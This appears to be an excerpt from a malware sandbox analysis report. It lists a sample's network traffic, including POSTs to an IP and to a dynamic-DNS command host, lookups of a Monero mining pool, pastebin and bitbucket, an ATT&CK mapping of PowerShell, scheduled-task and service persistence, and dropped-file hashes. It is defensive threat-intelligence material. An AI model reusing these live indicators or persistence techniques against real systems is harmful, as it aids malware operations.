GET http://ocsp.r2m01.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAO9ExOMvLBqk2jkjdZnyjA%3DHTTP Response
200 -
1.6kB 565 B 9 6
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
1.6kB 525 B 8 5
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
1.4kB 518 B 8 5
HTTP Request
POST https://49.12.197.9/HTTP Response
200 -
3.3kB 132 B 7 3
HTTP Request
POST http://cowod.hopto.org/ -
1.4kB 2.9kB 8 6
-
886 B 3.1kB 8 7
-
1.4kB 3.3kB 9 8
-
996 B 4.6kB 10 10
-
1.7kB 6.5kB 16 15
-
72 B 158 B 1 1
DNS Request
209.205.72.20.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
88.210.23.2.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
133.32.126.40.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
73 B 159 B 1 1
DNS Request
228.249.119.40.in-addr.arpa
-
64 B 80 B 1 1
DNS Request
steamcommunity.com
DNS Response
104.82.234.109
-
73 B 139 B 1 1
DNS Request
109.234.82.104.in-addr.arpa
-
70 B 125 B 1 1
DNS Request
9.197.12.49.in-addr.arpa
-
59 B 107 B 1 1
DNS Request
bitbucket.org
DNS Response
185.166.142.23185.166.142.21185.166.142.22
-
73 B 133 B 1 1
DNS Request
23.142.166.185.in-addr.arpa
-
76 B 254 B 1 1
DNS Request
bbuseruploads.s3.amazonaws.com
DNS Response
3.5.16.1316.182.71.10554.231.228.4152.216.37.9716.182.38.1773.5.28.15454.231.197.12952.216.51.145
-
72 B 88 B 1 1
DNS Request
ocsp.r2m01.amazontrust.com
DNS Response
18.238.246.206
-
71 B 157 B 1 1
DNS Request
197.87.175.4.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
15.164.165.52.in-addr.arpa
-
68 B 110 B 1 1
DNS Request
13.16.5.3.in-addr.arpa
-
72 B 129 B 1 1
DNS Request
174.15.239.18.in-addr.arpa
-
70 B 124 B 1 1
DNS Request
80.41.65.18.in-addr.arpa
-
73 B 131 B 1 1
DNS Request
206.246.238.18.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.214.232.199.in-addr.arpa
-
61 B 77 B 1 1
DNS Request
cowod.hopto.org
DNS Response
45.132.206.251
-
73 B 134 B 1 1
DNS Request
251.206.132.45.in-addr.arpa
-
66 B 242 B 1 1
DNS Request
xmr-eu1.nanopool.org
DNS Response
51.15.65.182146.59.154.10654.37.137.11451.15.193.13051.89.23.91163.172.154.142212.47.253.124162.19.224.121141.94.23.8351.15.58.22454.37.232.103
-
58 B 106 B 1 1
DNS Request
pastebin.com
DNS Response
172.67.19.24104.20.3.235104.20.4.235
-
74 B 123 B 1 1
DNS Request
142.154.172.163.in-addr.arpa
-
71 B 133 B 1 1
DNS Request
24.19.67.172.in-addr.arpa
-
66 B 242 B 1 1
DNS Request
xmr-eu1.nanopool.org
DNS Response
163.172.154.14254.37.232.103162.19.224.121141.94.23.83146.59.154.10654.37.137.11451.15.193.13051.15.65.18251.15.58.22451.89.23.91212.47.253.124
-
58 B 106 B 1 1
DNS Request
pastebin.com
DNS Response
104.20.3.235172.67.19.24104.20.4.235
-
72 B 119 B 1 1
DNS Request
130.193.15.51.in-addr.arpa
-
71 B 133 B 1 1
DNS Request
235.3.20.104.in-addr.arpa
-
70 B 108 B 1 1
DNS Request
91.23.89.51.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
43.229.111.52.in-addr.arpa
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Create or Modify System Process
2Windows Service
2Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.4MB
MD5925ec45b5ac88ab7af039190589204b9
SHA1c71158e158d9b593be3187340c731cab5f14ad98
SHA256419901e7e1747a9c413e657920429ce1d31e1b5af24e68a7dd79629066118133
SHA512089ade1924ffc617670cac36e90d2c302d5b1d9e9edb1501fb0ba2c82ef530dae019b037923cdc45482998fec83fc0c5256f1fc55f22ad4b386721432cd96890
-
Filesize
5.6MB
MD52eea3ddbfc81544b54a4ac5028a30805
SHA1b57ad8495421c6bc56498d494a99b4e0cbfabdea
SHA256ab043bb5ec1911f462c0e6341efb93c2760f097becc0c01ecbd02e5949b10025
SHA5120b87ff6eb029675c2b6a9af0136270cb0cfcced04f53756dd35983962b46dbd79cc6ffc679ea3f84b5c6b6f25df07af886ddb3c8a770dfa31fd5b5a522cf9f79
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
14KB
MD50c0195c48b6b8582fa6f6373032118da
SHA1d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA25611bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD52b24135c275cd88473601b97234e4c4d
SHA15aac75438f222f430ab9b95f80f22a5626c498fa
SHA256f66b5a12ca819afeb838fe912093d4c3cab6287fddad1ae516052a83a35b8983
SHA512274f62312c4734c8ea7ec02411a3f0e179871b76660f487a3b0a7b9934675e414ca5bc7f3bf89d133aca52b947e8e309cdc3c5fa066e47516ce55414e498ffbd
-
Filesize
3KB
MD500930b40cba79465b7a38ed0449d1449
SHA14b25a89ee28b20ba162f23772ddaf017669092a5
SHA256eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62